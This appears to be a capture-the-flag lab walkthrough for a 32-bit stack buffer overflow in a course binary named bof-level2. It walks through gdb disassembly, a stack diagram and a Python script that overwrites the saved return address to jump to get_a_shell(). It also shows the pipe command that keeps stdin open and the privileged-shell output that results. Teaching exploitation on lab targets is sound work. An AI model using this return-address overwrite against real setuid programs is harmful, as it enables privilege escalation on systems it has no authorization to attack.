========== bof-level2 ========== Let's open the binary program using gdb, and let's also open the source code, and list them side by side. gdb-peda$ disas receive_input Dump of assembler code for function receive_input: void receive_input() { ### FUNCTION PROLOGUE ### 0x08048570 <+0>: push %ebp 0x08048571 <+1>: mov %esp,%ebp 0x08048573 <+3>: push %esi 0x08048574 <+4>: sub $0x54,%esp ### FUNCTION PROLOGUE ENDS ### int a = 0x41414141, b = 0x42424242; char buf[20]; 0x08048577 <+7>: lea 0x8048737,%eax 0x0804857d <+13>: movl $0x41414141,-0x8(%ebp) 0x08048584 <+20>: movl $0x42424242,-0xc(%ebp) -> seems a is at -0x8(%ebp), and b is at -0xc(%ebp). 0x0804858b <+27>: mov -0x8(%ebp),%ecx 0x0804858e <+30>: mov -0xc(%ebp),%edx 0x08048591 <+33>: mov %eax,(%esp) 0x08048594 <+36>: mov %ecx,0x4(%esp) 0x08048598 <+40>: mov %edx,0x8(%esp) 0x0804859c <+44>: call 0x8048370 -> printf("Your variables are: a = 0x%08x b = 0x%08x\n", a, b); 0x080485a1 <+49>: lea 0x8048762,%ecx 0x080485a7 <+55>: mov %ecx,(%esp) 0x080485aa <+58>: mov %eax,-0x24(%ebp) 0x080485ad <+61>: call 0x8048370 -> printf("Are you happy with such values?\n"); 0x080485b2 <+66>: lea 0x8048783,%ecx 0x080485b8 <+72>: mov %ecx,(%esp) 0x080485bb <+75>: mov %eax,-0x28(%ebp) 0x080485be <+78>: call 0x8048370 -> printf("Type YES if you agree with this... (a fake message)\n"); 0x080485c3 <+83>: mov $0x80,%ecx 0x080485c8 <+88>: lea -0x20(%ebp),%edx <-- this is buf. 0x080485cb <+91>: mov 0x804a040,%esi 0x080485d1 <+97>: mov %edx,(%esp) <-- buf, 0x080485d4 <+100>: movl $0x80,0x4(%esp) 0x080485dc <+108>: mov %esi,0x8(%esp) 0x080485e0 <+112>: mov %eax,-0x2c(%ebp) 0x080485e3 <+115>: mov %ecx,-0x30(%ebp) 0x080485e6 <+118>: call 0x8048380 -> fgets(buf, 128, stdin); buf is at -0x20(%ebp). Max size is 20, but the function reads 128 bytes (BUFFER OVERFLOW HERE!) 0x080485eb <+123>: lea 0x80487b8,%ecx 0x080485f1 <+129>: mov -0x8(%ebp),%edx 0x080485f4 <+132>: mov -0xc(%ebp),%esi 0x080485f7 <+135>: mov %ecx,(%esp) 0x080485fa <+138>: mov %edx,0x4(%esp) 0x080485fe <+142>: mov %esi,0x8(%esp) 0x08048602 <+146>: mov %eax,-0x34(%ebp) 0x08048605 <+149>: call 0x8048370 -> printf("Now your variables are: a = 0x%08x b = 0x%08x\n", a, b); 0x0804860a <+154>: cmpl $0x48474645,-0x8(%ebp) 0x08048611 <+161>: mov %eax,-0x38(%ebp) 0x08048614 <+164>: jne 0x804864e 0x0804861a <+170>: cmpl $0x44434241,-0xc(%ebp) 0x08048621 <+177>: jne 0x804864e -> if(a == 0x48474645 && b == 0x44434241) { 0x08048627 <+183>: lea 0x80487e7,%eax 0x0804862d <+189>: mov %eax,(%esp) 0x08048630 <+192>: call 0x8048370 -> printf("Great, but I will not execute get_a_shell() for you..\n"); 0x08048635 <+197>: lea 0x804881e,%ecx 0x0804863b <+203>: mov %ecx,(%esp) 0x0804863e <+206>: mov %eax,-0x3c(%ebp) 0x08048641 <+209>: call 0x8048370 -> printf("Run it yourself!\n"); 0x08048646 <+214>: mov %eax,-0x40(%ebp) 0x08048649 <+217>: jmp 0x804865f } else { 0x0804864e <+222>: lea 0x8048830,%eax 0x08048654 <+228>: mov %eax,(%esp) 0x08048657 <+231>: call 0x8048370 -> printf("Analyze the program!\n"); 0x0804865c <+236>: mov %eax,-0x44(%ebp) } ### FUNCTION EPILOGUE ### 0x0804865f <+239>: add $0x54,%esp 0x08048662 <+242>: pop %esi 0x08048663 <+243>: pop %ebp 0x08048664 <+244>: ret ### FUNCTION EPILOGUE END ### } So you can see the assembly lines and the source code side by side. From fgets(buf, 128, stdin), you can identify the variable buf is at -0x20(%ebp), and from: int a = 0x41414141, b = 0x42424242; 0x0804857d <+13>: movl $0x41414141,-0x8(%ebp) 0x08048584 <+20>: movl $0x42424242,-0xc(%ebp), you can identify the variable a is at -0x8(%ebp) and the variable b is at -0xc(%ebp). We can draw a stack diagram as follows: [buf ebp-20 (20 bytes, from -0xc - 0x20)][b ebp-c][a ebp-8] \______________ 20 bytes_______________/ \_4bytes/\_4bytes/ So if you type 12345678901234567890ABCD, then this will overwrite the variable 'b' as follows: [ buf ][_b][_a] 12345678901234567890ABCD And if you type 12345678901234567890ABCDEFGH, then this will overwrite the both variables 'b' and 'a' as follows: [ buf ][_b][_a] 12345678901234567890ABCDEFGH As the result, _b will store ABCD, which is 0x44434241, and _a will store EFGH, which is 0x48474645. But even if you have matched the values for the if condition, the program will not execute get_a_shell(). Let's overwrite the function's return address to run get_a_shell(). From the slide, we have learned that: saved ebp is stored at 0x0(%ebp), and the function's return address is stored at 0x4(%ebp). Let's draw the current function's stack diagram by including those addresses. 12345678901234567890ABCDEFGH????????XXXX [ buf ebp-20 ][_b][_a][si][bp][ret] \____ 20 bytes_____/\_4/\_4/\4_/\_4/.... We have buf (20), b (4), a (4), and one unused 4-byte block for storing %esi at -0x4(%ebp) (4), then saved %ebp (4), and return address. (parentheses indicates the number of bytes of the object's occupancy in memory). To reach to the point where return address is stored, we need to fill 20 + 4 + 4 + 4 + 4 = 36 bytes, and then we can put the return address from 37th to 40th bytes. Then, let's get the address of 'get_a_shell()'. You can easily get that from gdb, by running following commands: gdb-peda$ print get_a_shell $1 = {} 0x8048500 gdb-peda$ info functions All defined functions: Non-debugging symbols: 0x08048330 _init 0x08048370 printf@plt 0x08048380 fgets@plt 0x08048390 getegid@plt 0x080483a0 __libc_start_main@plt 0x080483b0 execl@plt 0x080483c0 setregid@plt 0x080483e0 _start 0x08048420 _dl_relocate_static_pie 0x08048430 __x86.get_pc_thunk.bx 0x08048440 deregister_tm_clones 0x08048480 register_tm_clones 0x080484c0 __do_global_dtors_aux 0x080484f0 frame_dummy 0x08048500 get_a_shell <-- HERE! 0x08048570 receive_input 0x08048670 main 0x08048690 __libc_csu_init 0x080486f0 __libc_csu_fini 0x080486f4 _fini So we need to put 0x8048500, but because it's little endian, we will put: "\x00\x85\x04\x08" as 0x08048500 (it's 08 04 85 00 and then reverse!). v"\x00\x85\x04\x08" 12345678901234567890ABCDEFGH12345678 [ buf ebp-20 ][_b][_a][si][bp][ret] \____ 20 bytes_____/\_4/\_4/\4_/\_4/.... And because we cannot type these characters, we will use Python to create and pass that string to the program as follows: ## run.py ## #!/usr/bin/env python string = "1" * 36 + "\x00\x85\x04\x08" with open('input.txt', 'wb') as f: f.write(string) ## run.py END ## By running this program, you will get input.txt. red9057@blue9057-vm-ctf1 : ~ $ python run.py red9057@blue9057-vm-ctf1 : ~ $ ls -als input.txt 4 -rw-rw-r-- 1 red9057 red9057 40 Oct 3 12:36 input.txt Then, we will pass this file as the program's input. How? We will use pipe in shell. In the shell command line, the command $ A | B means that feeding A's output as B's input. So if we run: $ cat input.txt | /home/labs/week2/bof-level2/bof-level2 then our programmatically generated string will be given as the input of the program. red9057@blue9057-vm-ctf1 : ~ $ cat input.txt | /home/labs/week2/bof-level2/bof-level2 Your variables are: a = 0x41414141 b = 0x42424242 Are you happy with such values? Type YES if you agree with this... (a fake message) Now your variables are: a = 0x31313131 b = 0x31313131 Analyze the program! Spawning a privileged shell Oh, yes. It works. However, after running get_a_shell(), you might want to run following commands: $ cat /home/labs/week2/bof-level2/flag But you cannot type because the program execution has already be finished. Why? Because the pipe will cut the input stream after sending all the data to the target program. We need to keep that opening, and also we need a method for delivering our keyboard input to the program. To do that, we will use cat again, because if you just running the program 'cat', what it will do is the program will print what you typed followed by an 'ENTER' keystroke. So the running command will be: $ (cat input.txt; cat) | /home/labs/week2/bof-level2/bof-level2 and with this command, we can keep that pipe open for your keystrokes after delivering all the contents in input.txt. Let's run it. red9057@blue9057-vm-ctf1 : ~ $ (cat input.txt; cat) | /home/labs/week2/bof-level2/bof-level2 Your variables are: a = 0x41414141 b = 0x42424242 Are you happy with such values? Type YES if you agree with this... (a fake message) Now your variables are: a = 0x31313131 b = 0x31313131 Analyze the program! Spawning a privileged shell id uid=1006(red9057) gid=50202(week2-level2-ok) groups=50202(week2-level2-ok),1006(red9057) Yes, we got the privilege.